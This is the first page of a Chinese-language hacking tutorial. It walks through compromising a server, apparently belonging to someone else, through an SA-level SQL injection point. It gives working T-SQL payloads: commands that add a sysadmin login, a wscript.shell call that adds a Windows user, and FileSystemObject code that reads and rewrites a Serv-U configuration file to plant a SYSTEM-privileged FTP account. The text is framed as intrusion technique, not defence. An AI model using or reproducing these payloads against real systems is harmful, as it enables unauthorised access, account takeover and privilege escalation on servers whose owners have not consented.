正文:

　　从本文你可以学到:

　　1.MSSQL中一些扩展的应用

　　2.网站配置文件插入一句话

　　3.如何突破一流信息监控系统

　　这期这篇文章呢其实是比较杂乱的，所以我也不知道题目要用什么好，不过相信我，这篇文章看完之后你一定会学到很多新的在渗透过程中思路，OK，跟我来吧!

　　一、SQL server的灵活应用

　　我们知道在渗透过程中思路是最重要的，有时候往往一个细节就决定成败。呵呵，不过理论终究是理论，看过我以前文章的朋友一定知道，我更喜欢以一个事例来讲解一个东西。因为我只是讲一个思路的问题，所以就不会写很多，只写经典的部分，如果大家需要的话以后我会单独写一篇渗透的文章，来详细介绍每一个方法的使用。OK，我们开始吧!

　　话说前几天朋友丢给我一个SA的注射点.但是死活就是不能执行命令。说问我能不能帮忙看看。既然朋友说话了并且据说是非常BT的SA，自己也愿意挑战下。拿到地址后首先telnet一下它的1433。呵呵，这个可能很多朋友就不会注意为什么要先telnet呢?因为是SA嘛，只要能telnet上去我们就可以在注射点那里执行命令。加一个具有SA权限的sql用户上去，这样在查询分析器里执行命令要比在注射点那里方便的多呢。使用●telnet 61.129.251. x 1433 ●发现可以telnet上去. OK 马上在注射点后面执行:

　　★

　　exec master.dbo.sp_addlogin fishing hook;

　　exec master.dbo.sp_addsrvrolemember fishing,sysadmin

　　★

　　这个命令就是添加一个用户名为fishing密码为hook的SQL用户，权限为SA。两次执行页面都返回成功，说明用户添加成功了。使用SQL server的查询分析器连上，然后执行exec master.dbo.xp_cmdshell 'net user' 发现提示错误：

　　★

　　错误消息

　　50001，级别 1，状态 50001

　　xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)

　　★

　　很多朋友问过我这个错误信息是什么意思，这里解释一下，其实很简单，那个错误是明明写着 CreateProcess 进程无法创建,而xp_cmdshell 是执行什么进程大家应该知道吧，CMD这个进程无法创建!有可能CMD设置权限拒绝SYSTEM访问，有可能是CMD删除或者改名。以上情况都可以造成 CMD进程无法创建的，如图1。

　　图1

　　看来直接想加用户登陆服务器是不可能了，可能有的朋友会说：不是还有SP_OAcreate 么?但是我在使用SP_OAcreate执行：

　　★

　　DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD

　　@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user fish sadfish /add'

　　★

　　的时候虽然提示执行成功，但是却发现用户并没有添加进去，初步估计应该是wscript.shell被删掉了。

　　另外如果xp_regwrite 这个存储在的话我们还可以用沙盒模式搞定他的。不过虽然以上三个重要的存储过程都不能用，但是我们还可以用xp_subdirs来列目录。在列到D盘的时候发现了服务器装有serv-u，聪明的朋友们是不是想到了什么?我们可以通过使用FSO在suer-v的●ServUDaemon.ini●里写配置信息 添加一个具有system权限的ftp用户，说做就做，首先使用

　　★

　　declare @o int, @f int, @t int, @ret int

　　declare @line varchar(8000)

　　exec sp_oacreate 'scripting.filesystemobject', @o out

　　exec sp_oamethod @o, 'opentextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1

　　exec @ret = sp_oamethod @f, 'readline', @line out

　　while( @ret = 0 )

　　begin

　　print @line

　　exec @ret = sp_oamethod @f, 'readline', @line out

　　end

　　★

　　这段代码的意思是通过使用存储过程来读取d:\Serv-U6.3\ServUDaemon.ini里的配置信息，返回执行成功 如图2

　　既然可以读了 那么我们是不是可以写一个进去?继续执行

　　★

　　declare @o int, @f int, @t int, @ret int

　　exec sp_oacreate 'scripting.filesystemobject', @o out

　　exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1

　　exec @ret = sp_oamethod @f, 'writeline', NULL, 《这里添写自己写好的SU配置信息，刚才复制的那些都要写上去，在最后添加我们自己的，跟我们在WEBSHELL里的serv-u提权是一样的》

　　★

　　按F5，执行一下，发现命令执行成功，马上使用上面的语句复查一下，发现已经写进去了，如图3。

　　图3

[1] [2] 下一页